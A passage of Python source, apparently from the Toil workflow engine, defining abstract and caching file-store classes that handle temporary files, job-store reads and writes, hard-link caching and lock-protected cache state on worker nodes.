return '%s(%s, ...)' % (self.__class__.__name__, self.name)
__repr__ = __str__
class FileStore(with_metaclass(ABCMeta, object)):
"""
An abstract base class to represent the interface between a worker and the job store. Concrete
subclasses will be used to manage temporary files, read and write files from the job store and
log messages, passed as argument to the :meth:`toil.job.Job.run` method.
"""
# Variables used for syncing reads/writes
_pendingFileWritesLock = Semaphore()
_pendingFileWrites = set()
_terminateEvent = Event() # Used to signify crashes in threads
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
self.jobStore = jobStore
self.jobGraph = jobGraph
self.localTempDir = os.path.abspath(localTempDir)
self.workFlowDir = os.path.dirname(self.localTempDir)
self.jobName = self.jobGraph.command.split()[1]
self.inputBlockFn = inputBlockFn
self.loggingMessages = []
self.filesToDelete = set()
self.jobsToDelete = set()
@staticmethod
def createFileStore(jobStore, jobGraph, localTempDir, inputBlockFn, caching):
fileStoreCls = CachingFileStore if caching else NonCachingFileStore
return fileStoreCls(jobStore, jobGraph, localTempDir, inputBlockFn)
@abstractmethod
@contextmanager
def open(self, job):
"""
The context manager used to conduct tasks prior to, and after, a job has been run.
:param toil.job.Job job: The job instance of the toil job to run.
"""
raise NotImplementedError()
# Functions related to temp files and directories
def getLocalTempDir(self):
"""
Get a new local temporary directory in which to write files that persist for the duration of
the job.
:return: The absolute path to a new local temporary directory. This directory will exist
for the duration of the job only, and is guaranteed to be deleted once the job
terminates, removing all files it contains recursively.
:rtype: str
"""
return os.path.abspath(tempfile.mkdtemp(prefix="t", dir=self.localTempDir))
def getLocalTempFile(self):
"""
Get a new local temporary file that will persist for the duration of the job.
:return: The absolute path to a local temporary file. This file will exist for the
duration of the job only, and is guaranteed to be deleted once the job terminates.
:rtype: str
"""
handle, tmpFile = tempfile.mkstemp(prefix="tmp", suffix=".tmp", dir=self.localTempDir)
os.close(handle)
return os.path.abspath(tmpFile)
def getLocalTempFileName(self):
"""
Get a valid name for a new local file. Don't actually create a file at the path.
:return: Path to valid file
:rtype: str
"""
# Create, and then delete a temp file. Creating will guarantee you a unique, unused
# file name. There is a very, very, very low chance that another job will create the
# same file name in the span of this one being deleted and then being used by the user.
tempFile = self.getLocalTempFile()
os.remove(tempFile)
return tempFile
# Functions related to reading, writing and removing files to/from the job store
@abstractmethod
def writeGlobalFile(self, localFileName, cleanup=False):
"""
Takes a file (as a path) and uploads it to the job store.
:param string localFileName: The path to the local file to upload.
:param bool cleanup: if True then the copy of the global file will be deleted once the
job and all its successors have completed running. If not the global file must be
deleted manually.
:return: an ID that can be used to retrieve the file.
:rtype: toil.fileStore.FileID
"""
raise NotImplementedError()
def writeGlobalFileStream(self, cleanup=False):
"""
Similar to writeGlobalFile, but allows the writing of a stream to the job store.
The yielded file handle does not need to and should not be closed explicitly.
:param bool cleanup: is as in :func:`toil.fileStore.FileStore.writeGlobalFile`.
:return: A context manager yielding a tuple of
1) a file handle which can be written to and
2) the ID of the resulting file in the job store.
"""
# TODO: Make this work with FileID
return self.jobStore.writeFileStream(None if not cleanup else self.jobGraph.jobStoreID)
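# Usage sketch (assumed calling pattern, based on the docstring above):
#   with fileStore.writeGlobalFileStream(cleanup=True) as (fileHandle, fileID):
#       fileHandle.write(b"some bytes")
#   # fileID can later be passed to readGlobalFile() / readGlobalFileStream()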
@abstractmethod
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
"""
Makes the file associated with fileStoreID available locally. If mutable is True,
then a copy of the file will be created locally so that the original is not modified
and does not change the file for other jobs. If mutable is False, then a link can
be created to the file, saving disk resources.
If a user path is specified, it is used as the destination. If a user path isn't
specified, the file is stored in the local temp directory with an encoded name.
:param toil.fileStore.FileID fileStoreID: job store id for the file
:param string userPath: a path to the name of file to which the global file will be copied
or hard-linked (see below).
:param bool cache: Described in :func:`toil.fileStore.CachingFileStore.readGlobalFile`
:param bool mutable: Described in :func:`toil.fileStore.CachingFileStore.readGlobalFile`
:return: An absolute path to a local, temporary copy of the file keyed by fileStoreID.
:rtype: str
"""
raise NotImplementedError()
@abstractmethod
def readGlobalFileStream(self, fileStoreID):
"""
Similar to readGlobalFile, but allows a stream to be read from the job store. The yielded
file handle does not need to and should not be closed explicitly.
:return: a context manager yielding a file handle which can be read from.
"""
raise NotImplementedError()
@abstractmethod
def deleteLocalFile(self, fileStoreID):
"""
Deletes local copies of files associated with the provided job store ID.
:param str fileStoreID: File Store ID of the file to be deleted.
"""
raise NotImplementedError()
@abstractmethod
def deleteGlobalFile(self, fileStoreID):
"""
Deletes local files with the provided job store ID and then permanently deletes them from
the job store. To ensure that the job can be restarted if necessary, the delete will not
happen until after the job's run method has completed.
:param fileStoreID: the job store ID of the file to be deleted.
"""
raise NotImplementedError()
# Functions used to read and write files directly between a source url and the job store.
def importFile(self, srcUrl, sharedFileName=None):
return self.jobStore.importFile(srcUrl, sharedFileName=sharedFileName)
def exportFile(self, jobStoreFileID, dstUrl):
raise NotImplementedError()
# A utility method for accessing filenames
def _resolveAbsoluteLocalPath(self, filePath):
"""
Return the absolute path to filePath. This is a wrapper for os.path.abspath because mac OS
symlinks /tmp and /var (the most common places for a default tempdir) to /private/tmp and
/private/var respectively.
:param str filePath: The absolute or relative path to the file. If relative, it must be
relative to the local temp working dir
:return: Absolute path to key
:rtype: str
"""
if os.path.isabs(filePath):
return os.path.abspath(filePath)
else:
return os.path.join(self.localTempDir, filePath)
class _StateFile(object):
"""
Utility class to read and write dill-ed state dictionaries from/to a file into a namespace.
"""
def __init__(self, stateDict):
assert isinstance(stateDict, dict)
self.__dict__.update(stateDict)
@abstractclassmethod
@contextmanager
def open(cls, outer=None):
"""
This is a context manager that opens the state file and reads it into an object that is returned
to the user in the yield.
:param outer: Instance of the calling class (to use outer methods).
"""
raise NotImplementedError()
@classmethod
def _load(cls, fileName):
"""
Load the state of the cache from the state file
:param str fileName: Path to the cache state file.
:return: An instance of the state as a namespace.
:rtype: _StateFile
"""
# Read the value from the cache state file then initialize an instance of
# _CacheState with it.
with open(fileName, 'rb') as fH:
infoDict = dill.load(fH)
return cls(infoDict)
def write(self, fileName):
"""
Write the current state into a temporary file then atomically rename it to the main
state file.
:param str fileName: Path to the state file.
"""
with open(fileName + '.tmp', 'wb') as fH:
# Based on answer by user "Mark" at:
# http://stackoverflow.com/questions/2709800/how-to-pickle-yourself
# We can't pickle nested classes. So we have to pickle the variables of the class
# If we ever change this, we need to ensure it doesn't break FileID
dill.dump(self.__dict__, fH)
os.rename(fileName + '.tmp', fileName)
# Methods related to the deferred function logic
@abstractclassmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
This function looks at the state of all jobs registered on the node and will handle them
(clean up their presence on the node, and run any registered defer functions)
:param nodeInfo: Information regarding the node required for identifying dead jobs.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
"""
raise NotImplementedError()
@abstractmethod
def _registerDeferredFunction(self, deferredFunction):
"""
Register the given deferred function with this job.
:param DeferredFunction deferredFunction: the function to register
"""
raise NotImplementedError()
@staticmethod
def _runDeferredFunctions(deferredFunctions):
"""
Invoke the specified deferred functions and return a list of names of functions that
raised an exception while being invoked.
:param list[DeferredFunction] deferredFunctions: the DeferredFunctions to run
:rtype: list[str]
"""
failures = []
for deferredFunction in deferredFunctions:
try:
deferredFunction.invoke()
except:
failures.append(deferredFunction.name)
logger.exception('%s failed.', deferredFunction)
return failures
# Functions related to logging
def logToMaster(self, text, level=logging.INFO):
"""
Send a logging message to the leader. The message will also be \
logged by the worker at the same level.
:param text: The string to log.
:param int level: The logging level.
"""
logger.log(level=level, msg=("LOG-TO-MASTER: " + text))
self.loggingMessages.append(dict(text=text, level=level))
# Functions run after the completion of the job.
@abstractmethod
def _updateJobWhenDone(self):
"""
Update the status of the job on the disk.
"""
raise NotImplementedError()
@abstractmethod
def _blockFn(self):
"""
Blocks while _updateJobWhenDone is running. This function is called by this job's
successor to ensure that it does not begin modifying the job store until after this job has
finished doing so.
"""
raise NotImplementedError()
# Utility function used to identify if a pid is still running on the node.
@staticmethod
def _pidExists(pid):
"""
This will return True if the process associated with pid is still running on the machine.
This is based on stackoverflow question 568271.
:param int pid: ID of the process to check for
:return: True/False
:rtype: bool
"""
assert pid > 0
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
else:
raise
else:
return True
@abstractclassmethod
def shutdown(cls, dir_):
"""
Shutdown the filestore on this node.
This is intended to be called on batch system shutdown.
:param dir_: The keystone directory containing the required information for fixing the state
of failed workers on the node before cleaning up.
"""
raise NotImplementedError()
class CachingFileStore(FileStore):
"""
A cache-enabled file store that attempts to use hard-links and asynchronous job store writes to
reduce I/O between, and during jobs.
"""
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
super(CachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, inputBlockFn)
# Variables related to asynchronous writes.
self.workerNumber = 2
self.queue = Queue()
self.updateSemaphore = Semaphore()
self.workers = [Thread(target=self.asyncWrite) for i in range(self.workerNumber)]
for worker in self.workers:
worker.start()
# Variables related to caching
# cacheDir has to be 1 level above the local worker tempdir, at the same level as the
# worker dirs. At this point, localTempDir is the worker directory, not the job
# directory.
self.localCacheDir = os.path.join(os.path.dirname(localTempDir),
cacheDirName(self.jobStore.config.workflowID))
self.cacheLockFile = os.path.join(self.localCacheDir, '.cacheLock')
self.cacheStateFile = os.path.join(self.localCacheDir, '_cacheState')
# Since each worker has its own unique CachingFileStore instance, and only one Job can run
# at a time on a worker, we can bookkeep the job's file store operated files in a
# dictionary.
self.jobSpecificFiles = {}
self.jobName = str(self.jobGraph)
self.jobID = sha1(self.jobName.encode('utf-8')).hexdigest()
logger.debug('Starting job (%s) with ID (%s).', self.jobName, self.jobID)
# A variable to describe how many hard links an unused file in the cache will have.
self.nlinkThreshold = None
self.workflowAttemptNumber = self.jobStore.config.workflowAttemptNumber
# This is a flag to better resolve cache equation imbalances at cleanup time.
self.cleanupInProgress = False
# Now that we've setup all the required variables, setup the cache directory for the
# job if required.
self._setupCache()
@contextmanager
def open(self, job):
"""
This context manager decorated method allows cache-specific operations to be conducted
before and after the execution of a job in worker.py
"""
# Create a working directory for the job
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
# Check the status of all jobs on this node. If there are jobs that started and died before
# cleaning up their presence from the cache state file, restore the cache file to a state
# where the jobs don't exist.
with self._CacheState.open(self) as cacheInfo:
self.findAndHandleDeadJobs(cacheInfo)
# While we have a lock on the cache file, run a naive check to see if jobs on this node
# have greatly gone over their requested limits.
if cacheInfo.sigmaJob < 0:
logger.warning('Detecting that one or more jobs on this node have used more '
'resources than requested. Turn on debug logs to see more '
'information on cache usage.')
# Get the requirements for the job and clean the cache if necessary. cleanCache will
# ensure that the requirements for this job are stored in the state file.
jobReqs = job.disk
# Cleanup the cache to free up enough space for this job (if needed)
self.cleanCache(jobReqs)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Please reconsider modifying "
"the user script to avoid the chance of failure due to "
"incorrectly requested resources. " + logString,
level=logging.WARNING)
os.chdir(startingDir)
self.cleanupInProgress = True
# Delete all the job specific files and return sizes to jobReqs
self.returnJobReqs(jobReqs)
with self._CacheState.open(self) as cacheInfo:
# Carry out any user-defined cleanup actions
deferredFunctions = cacheInfo.jobState[self.jobID]['deferredFunctions']
failures = self._runDeferredFunctions(deferredFunctions)
for failure in failures:
self.logToMaster('Deferred function "%s" failed.' % failure, logging.WARN)
# Finally delete the job from the cache state file
cacheInfo.jobState.pop(self.jobID)
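    # Usage sketch (an assumption about the caller, not shown in this file): worker.py is
    # expected to drive this as `with fileStore.open(job): <run the job's user code>`, so the
    # disk accounting and deferred-function cleanup above bracket exactly one job's execution.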
# Functions related to reading, writing and removing files to/from the job store
def writeGlobalFile(self, localFileName, cleanup=False):
"""
Takes a file (as a path) and uploads it to the job store. Depending on the jobstore
used, carry out the appropriate cache functions.
"""
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
        # If cleanup was requested, associate the file with this job's jobStoreID so the job
        # store deletes it along with the job.
cleanupID = None if not cleanup else self.jobGraph.jobStoreID
# If the file is from the scope of local temp dir
if absLocalFileName.startswith(self.localTempDir):
# If the job store is of type FileJobStore and the job store and the local temp dir
            # are on the same file system, then we want to hard link the files instead of copying,
# barring the case where the file being written was one that was previously read
# from the file store. In that case, you want to copy to the file store so that
# the two have distinct nlink counts.
# Can read without a lock because we're only reading job-specific info.
jobSpecificFiles = list(self._CacheState._load(self.cacheStateFile).jobState[
self.jobID]['filesToFSIDs'].keys())
# Saying nlink is 2 implicitly means we are using the job file store, and it is on
# the same device as the work dir.
if self.nlinkThreshold == 2 and absLocalFileName not in jobSpecificFiles:
jobStoreFileID = self.jobStore.getEmptyFileStoreID(cleanupID)
# getEmptyFileStoreID creates the file in the scope of the job store hence we
# need to delete it before linking.
os.remove(self.jobStore._getAbsPath(jobStoreFileID))
os.link(absLocalFileName, self.jobStore._getAbsPath(jobStoreFileID))
# If they're not on the file system, or if the file is already linked with an
# existing file, we need to copy to the job store.
# Check if the user allows asynchronous file writes
elif self.jobStore.config.useAsync:
jobStoreFileID = self.jobStore.getEmptyFileStoreID(cleanupID)
# Before we can start the async process, we should also create a dummy harbinger
# file in the cache such that any subsequent jobs asking for this file will not
# attempt to download it from the job store till the write is complete. We do
# this now instead of in the writing thread because there is an edge case where
# readGlobalFile in a subsequent job is called before the writing thread has
# received the message to write the file and has created the dummy harbinger
# (and the file was unable to be cached/was evicted from the cache).
harbingerFile = self.HarbingerFile(self, fileStoreID=jobStoreFileID)
harbingerFile.write()
fileHandle = open(absLocalFileName, 'rb')
with self._pendingFileWritesLock:
self._pendingFileWrites.add(jobStoreFileID)
                    # A file handle added to the queue allows the asyncWrite threads to remove
                    # the corresponding file ID from _pendingFileWrites. Therefore, a file
                    # should only be queued after its fileID is added to _pendingFileWrites.
self.queue.put((fileHandle, jobStoreFileID))
# Else write directly to the job store.
else:
jobStoreFileID = self.jobStore.writeFile(absLocalFileName, cleanupID)
# Local files are cached by default, unless they were written from previously read
# files.
if absLocalFileName not in jobSpecificFiles:
self.addToCache(absLocalFileName, jobStoreFileID, 'write')
else:
self._JobState.updateJobSpecificFiles(self, jobStoreFileID, absLocalFileName,
0.0, False)
# Else write directly to the job store.
else:
jobStoreFileID = self.jobStore.writeFile(absLocalFileName, cleanupID)
# Non local files are NOT cached by default, but they are tracked as local files.
self._JobState.updateJobSpecificFiles(self, jobStoreFileID, None,
0.0, False)
return FileID.forPath(jobStoreFileID, absLocalFileName)
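    # In summary, writeGlobalFile takes one of three paths for a local file: hard-link it into
    # a FileJobStore on the same device (nlinkThreshold == 2), queue it for an asynchronous
    # upload guarded by a harbinger file (config.useAsync), or fall back to a synchronous
    # jobStore.writeFile(); non-local files always take the synchronous path.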
def writeGlobalFileStream(self, cleanup=False):
# TODO: Make this work with caching
return super(CachingFileStore, self).writeGlobalFileStream(cleanup)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
"""
Downloads a file described by fileStoreID from the file store to the local directory.
The function first looks for the file in the cache and if found, it hardlinks to the
cached copy instead of downloading.
        The cache parameter will be used only if the file isn't already in the cache, and
        the provided user path (if specified) is within the scope of the local temp dir.
:param bool cache: If True, a copy of the file will be saved into a cache that can be
used by other workers. caching supports multiple concurrent workers requesting the
same file by allowing only one to download the file while the others wait for it to
complete.
:param bool mutable: If True, the file path returned points to a file that is
modifiable by the user. Using False is recommended as it saves disk by making
multiple workers share a file via hard links. The default is False.
"""
# Check that the file hasn't been deleted by the user
if fileStoreID in self.filesToDelete:
            raise RuntimeError(
                "Trying to access a file in the jobStore you've deleted: %s" % fileStoreID)
# Get the name of the file as it would be in the cache
cachedFileName = self.encodedFileID(fileStoreID)
# setup the harbinger variable for the file. This is an identifier that the file is
# currently being downloaded by another job and will be in the cache shortly. It is used
# to prevent multiple jobs from simultaneously downloading the same file from the file
# store.
harbingerFile = self.HarbingerFile(self, cachedFileName=cachedFileName)
# setup the output filename. If a name is provided, use it - This makes it a Named
# Local File. If a name isn't provided, use the base64 encoded name such that we can
# easily identify the files later on.
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
                # Overwriting an existing file is not allowed.
                raise RuntimeError('File %s exists. Cannot overwrite.' % localFilePath)
            fileIsLocal = localFilePath.startswith(self.localTempDir)
else:
localFilePath = self.getLocalTempFileName()
fileIsLocal = True
# First check whether the file is in cache. If it is, then hardlink the file to
# userPath. Cache operations can only occur on local files.
with self.cacheLock() as lockFileHandle:
if fileIsLocal and self._fileIsCached(fileStoreID):
logger.debug('CACHE: Cache hit on file with ID \'%s\'.' % fileStoreID)
assert not os.path.exists(localFilePath)
if mutable:
shutil.copyfile(cachedFileName, localFilePath)
cacheInfo = self._CacheState._load(self.cacheStateFile)
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobState.addToJobSpecFiles(fileStoreID, localFilePath, -1, None)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
else:
os.link(cachedFileName, localFilePath)
self.returnFileSize(fileStoreID, localFilePath, lockFileHandle,
fileAlreadyCached=True)
            # If the file is not in cache, check whether the .harbinger file for the given
            # FileStoreID exists. If it does, wait and periodically check for the removal of
            # the harbinger and the addition of the completed download to the cache by the
            # other job. Then we link to it.
elif fileIsLocal and harbingerFile.exists():
harbingerFile.waitOnDownload(lockFileHandle)
# If the code reaches here, the harbinger file has been removed. This means
# either the file was successfully downloaded and added to cache, or something
# failed. To prevent code duplication, we recursively call readGlobalFile.
flock(lockFileHandle, LOCK_UN)
return self.readGlobalFile(fileStoreID, userPath=userPath, cache=cache,
mutable=mutable)
# If the file is not in cache, then download it to the userPath and then add to
# cache if specified.
else:
logger.debug('CACHE: Cache miss on file with ID \'%s\'.' % fileStoreID)
if fileIsLocal and cache:
# If caching of the downloaded file is desired, First create the harbinger
# file so other jobs know not to redundantly download the same file. Write
# the PID of this process into the file so other jobs know who is carrying
# out the download.
harbingerFile.write()
# Now release the file lock while the file is downloaded as download could
# take a while.
flock(lockFileHandle, LOCK_UN)
# Use try:finally: so that the .harbinger file is removed whether the
# download succeeds or not.
try:
self.jobStore.readFile(fileStoreID,
'/.'.join(os.path.split(cachedFileName)))
except:
if os.path.exists('/.'.join(os.path.split(cachedFileName))):
os.remove('/.'.join(os.path.split(cachedFileName)))
raise
else:
                        # If the download succeeded, officially add the file to cache (by
# recording it in the cache lock file) if possible.
if os.path.exists('/.'.join(os.path.split(cachedFileName))):
os.rename('/.'.join(os.path.split(cachedFileName)), cachedFileName)
self.addToCache(localFilePath, fileStoreID, 'read', mutable)
# We don't need to return the file size here because addToCache
# already does it for us
finally:
# In any case, delete the harbinger file.
harbingerFile.delete()
else:
# Release the cache lock since the remaining stuff is not cache related.
flock(lockFileHandle, LOCK_UN)
self.jobStore.readFile(fileStoreID, localFilePath)
os.chmod(localFilePath, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
# Now that we have the file, we have 2 options. It's modifiable or not.
# Either way, we need to account for FileJobStore making links instead of
# copies.
if mutable:
if self.nlinkThreshold == 2:
# nlinkThreshold can only be 1 or 2 and it can only be 2 iff the
                        # job store is FileJobStore, and the job store and local temp dir
# are on the same device. An atomic rename removes the nlink on the
# file handle linked from the job store.
shutil.copyfile(localFilePath, localFilePath + '.tmp')
os.rename(localFilePath + '.tmp', localFilePath)
self._JobState.updateJobSpecificFiles(self, fileStoreID, localFilePath,
-1, False)
# If it was immutable
else:
if self.nlinkThreshold == 2:
self._accountForNlinkEquals2(localFilePath)
self._JobState.updateJobSpecificFiles(self, fileStoreID, localFilePath,
0.0, False)
return localFilePath
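    # In summary, readGlobalFile resolves in one of three ways: a cache hit (hard link, or a
    # copy when mutable=True), a wait on another worker's in-flight download signalled by a
    # harbinger file (followed by a recursive retry), or a fresh download that is optionally
    # promoted into the cache when cache=True and the destination is local.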
def exportFile(self, jobStoreFileID, dstUrl):
while jobStoreFileID in self._pendingFileWrites:
            # The file is still being written to the job store - wait for the write to finish
            # before exporting it
time.sleep(1)
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def readGlobalFileStream(self, fileStoreID):
if fileStoreID in self.filesToDelete:
raise RuntimeError(
"Trying to access a file in the jobStore you've deleted: %s" % fileStoreID)
# If fileStoreID is in the cache provide a handle from the local cache
if self._fileIsCached(fileStoreID):
logger.debug('CACHE: Cache hit on file with ID \'%s\'.' % fileStoreID)
return open(self.encodedFileID(fileStoreID), 'rb')
else:
logger.debug('CACHE: Cache miss on file with ID \'%s\'.' % fileStoreID)
return self.jobStore.readFileStream(fileStoreID)
def deleteLocalFile(self, fileStoreID):
        # The local file may or may not have been cached. If it was, we need to do some
        # bookkeeping; if it wasn't, we can usually just delete the file and continue, though
        # some bookkeeping may still be needed when the file store and cache live on the same
        # filesystem. We can tell whether a file was cached from the value held in the third
        # tuple element of the dict item keyed by fileStoreID: True if it was cached, else
        # False.
with self._CacheState.open(self) as cacheInfo:
jobState = self._JobState(cacheInfo.jobState[self.jobID])
if fileStoreID not in list(jobState.jobSpecificFiles.keys()):
                # ENOENT indicates that the file did not exist
raise OSError(errno.ENOENT, "Attempting to delete a non-local file")
# filesToDelete is a dictionary of file: fileSize
filesToDelete = jobState.jobSpecificFiles[fileStoreID]
allOwnedFiles = jobState.filesToFSIDs
for (fileToDelete, fileSize) in list(filesToDelete.items()):
# Handle the case where a file not in the local temp dir was written to
# filestore
if fileToDelete is None:
filesToDelete.pop(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
continue
# If the file size is zero (copied into the local temp dir) or -1 (mutable), we
# can safely delete without any bookkeeping
if fileSize in (0, -1):
# Only remove the file if there is only one FSID associated with it.
if len(allOwnedFiles[fileToDelete]) == 1:
try:
os.remove(fileToDelete)
except OSError as err:
if err.errno == errno.ENOENT and fileSize == -1:
logger.debug('%s was read mutably and deleted by the user',
fileToDelete)
else:
raise IllegalDeletionCacheError(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
filesToDelete.pop(fileToDelete)
cacheInfo.jobState[self.jobID] = jobState.__dict__
cacheInfo.write(self.cacheStateFile)
continue
# If not, we need to do bookkeeping
# Get the size of the file to be deleted, and the number of jobs using the file
# at the moment.
if not os.path.exists(fileToDelete):
raise IllegalDeletionCacheError(fileToDelete)
fileStats = os.stat(fileToDelete)
if fileSize != fileStats.st_size:
                logger.warning("The size on record differed from the real size by "
                               "%s bytes" % str(fileSize - fileStats.st_size))
# Remove the file and return file size to the job
if len(allOwnedFiles[fileToDelete]) == 1:
os.remove(fileToDelete)
cacheInfo.sigmaJob += fileSize
filesToDelete.pop(fileToDelete)
allOwnedFiles[fileToDelete].remove(fileStoreID)
jobState.updateJobReqs(fileSize, 'remove')
cacheInfo.jobState[self.jobID] = jobState.__dict__
# If the job is not in the process of cleaning up, then we may need to remove the
# cached copy of the file as well.
if not self.cleanupInProgress:
# If the file is cached and if other jobs are using the cached copy of the file,
# or if retaining the file in the cache doesn't affect the cache equation, then
# don't remove it from cache.
if self._fileIsCached(fileStoreID):
cachedFile = self.encodedFileID(fileStoreID)
jobsUsingFile = os.stat(cachedFile).st_nlink
if not cacheInfo.isBalanced() and jobsUsingFile == self.nlinkThreshold:
os.remove(cachedFile)
cacheInfo.cached -= fileSize
self.logToMaster('Successfully deleted cached copy of file with ID '
'\'%s\'.' % fileStoreID, level=logging.DEBUG)
self.logToMaster('Successfully deleted local copies of file with ID '
'\'%s\'.' % fileStoreID, level=logging.DEBUG)
def deleteGlobalFile(self, fileStoreID):
jobStateIsPopulated = False
with self._CacheState.open(self) as cacheInfo:
if self.jobID in cacheInfo.jobState:
jobState = self._JobState(cacheInfo.jobState[self.jobID])
jobStateIsPopulated = True
if jobStateIsPopulated and fileStoreID in list(jobState.jobSpecificFiles.keys()):
# Use deleteLocalFile in the backend to delete the local copy of the file.
self.deleteLocalFile(fileStoreID)
# At this point, the local file has been deleted, and possibly the cached copy. If
# the cached copy exists, it is either because another job is using the file, or
# because retaining the file in cache doesn't unbalance the caching equation. The
# first case is unacceptable for deleteGlobalFile and the second requires explicit
# deletion of the cached copy.
# Check if the fileStoreID is in the cache. If it is, ensure only the current job is
# using it.
cachedFile = self.encodedFileID(fileStoreID)
if os.path.exists(cachedFile):
self.removeSingleCachedFile(fileStoreID)
# Add the file to the list of files to be deleted once the run method completes.
self.filesToDelete.add(fileStoreID)
self.logToMaster('Added file with ID \'%s\' to the list of files to be' % fileStoreID +
' globally deleted.', level=logging.DEBUG)
# Cache related methods
@contextmanager
def cacheLock(self):
"""
This is a context manager to acquire a lock on the Lock file that will be used to
prevent synchronous cache operations between workers.
:yields: File descriptor for cache lock file in w mode
"""
cacheLockFile = open(self.cacheLockFile, 'w')
try:
flock(cacheLockFile, LOCK_EX)
logger.debug("CACHE: Obtained lock on file %s" % self.cacheLockFile)
yield cacheLockFile
except IOError:
logger.critical('CACHE: Unable to acquire lock on %s' % self.cacheLockFile)
raise
finally:
cacheLockFile.close()
logger.debug("CACHE: Released lock")
def _setupCache(self):
"""
Setup the cache based on the provided values for localCacheDir.
"""
# we first check whether the cache directory exists. If it doesn't, create it.
if not os.path.exists(self.localCacheDir):
# Create a temporary directory as this worker's private cache. If all goes well, it
# will be renamed into the cache for this node.
personalCacheDir = ''.join([os.path.dirname(self.localCacheDir), '/.ctmp-',
str(uuid.uuid4())])
os.mkdir(personalCacheDir, 0o755)
self._createCacheLockFile(personalCacheDir)
try:
os.rename(personalCacheDir, self.localCacheDir)
except OSError as err:
                # The only acceptable failure case is that the destination is a non-empty
                # directory. Assuming (the docs are ambiguous) atomic renaming of directories,
                # if the dst is non-empty, it only means that another worker has beaten this
                # one to the rename.
if err.errno == errno.ENOTEMPTY:
# Cleanup your own mess. It's only polite.
shutil.rmtree(personalCacheDir)
else:
raise
# You can't reach here unless a local cache directory has been created successfully
with self._CacheState.open(self) as cacheInfo:
# Ensure this cache is from the correct attempt at the workflow! If it isn't, we
# need to reset the cache lock file
if cacheInfo.attemptNumber != self.workflowAttemptNumber:
if cacheInfo.nlink == 2:
cacheInfo.cached = 0 # cached file sizes are accounted for by job store
else:
allCachedFiles = [os.path.join(self.localCacheDir, x)
for x in os.listdir(self.localCacheDir)
if not self._isHidden(x)]
cacheInfo.cached = sum([os.stat(cachedFile).st_size
for cachedFile in allCachedFiles])
# TODO: Delete the working directories
cacheInfo.sigmaJob = 0
cacheInfo.attemptNumber = self.workflowAttemptNumber
self.nlinkThreshold = cacheInfo.nlink
def _createCacheLockFile(self, tempCacheDir):
"""
        Create the cache lock file and cache state file used to track the state of the cache
        on the node.
:param str tempCacheDir: Temporary directory to use for setting up a cache lock file the
first time.
"""
        # The nlink threshold is set up along with the first instance of the cache class on the
        # node.
self.setNlinkThreshold()
# Get the free space on the device
freeSpace, _ = getFileSystemSize(tempCacheDir)
# Create the cache lock file.
open(os.path.join(tempCacheDir, os.path.basename(self.cacheLockFile)), 'w').close()
# Setup the cache state file
personalCacheStateFile = os.path.join(tempCacheDir,
os.path.basename(self.cacheStateFile))
# Setup the initial values for the cache state file in a dict
cacheInfo = self._CacheState({
'nlink': self.nlinkThreshold,
'attemptNumber': self.workflowAttemptNumber,
'total': freeSpace,
'cached': 0,
'sigmaJob': 0,
'cacheDir': self.localCacheDir,
'jobState': {}})
cacheInfo.write(personalCacheStateFile)
def encodedFileID(self, jobStoreFileID):
"""
Uses a url safe base64 encoding to encode the jobStoreFileID into a unique identifier to
use as filename within the cache folder. jobstore IDs are essentially urls/paths to
files and thus cannot be used as is. Base64 encoding is used since it is reversible.
:param jobStoreFileID: string representing a job store file ID
        :return: outCachedFile: A path to the encoded file name within localCacheDir
:rtype: str
"""
base64Text = base64.urlsafe_b64encode(jobStoreFileID.encode('utf-8')).decode('utf-8')
outCachedFile = os.path.join(self.localCacheDir, base64Text)
return outCachedFile
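    # Illustration (hypothetical ID): a jobStoreFileID of 'files/abc' is url-safe base64
    # encoded to 'ZmlsZXMvYWJj', so the cached copy would live at
    # <localCacheDir>/ZmlsZXMvYWJj, and decodedFileID() reverses the mapping.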
def _fileIsCached(self, jobStoreFileID):
"""
Is the file identified by jobStoreFileID in cache or not.
"""
return os.path.exists(self.encodedFileID(jobStoreFileID))
def decodedFileID(self, cachedFilePath):
"""
Decode a cached fileName back to a job store file ID.
:param str cachedFilePath: Path to the cached file
:return: The jobstore file ID associated with the file
:rtype: str
"""
fileDir, fileName = os.path.split(cachedFilePath)
assert fileDir == self.localCacheDir, 'Can\'t decode uncached file names'
# We encode and decode here because base64 can't work with unencoded text
        # It's probably worth, later, converting all file name variables to bytes
# and not text.
return base64.urlsafe_b64decode(fileName.encode('utf-8')).decode('utf-8')
def addToCache(self, localFilePath, jobStoreFileID, callingFunc, mutable=False):
"""
Used to process the caching of a file. This depends on whether a file is being written
to file store, or read from it.
WRITING
The file is in localTempDir. It needs to be linked into cache if possible.
READING
The file is already in the cache dir. Depending on whether it is modifiable or not, does
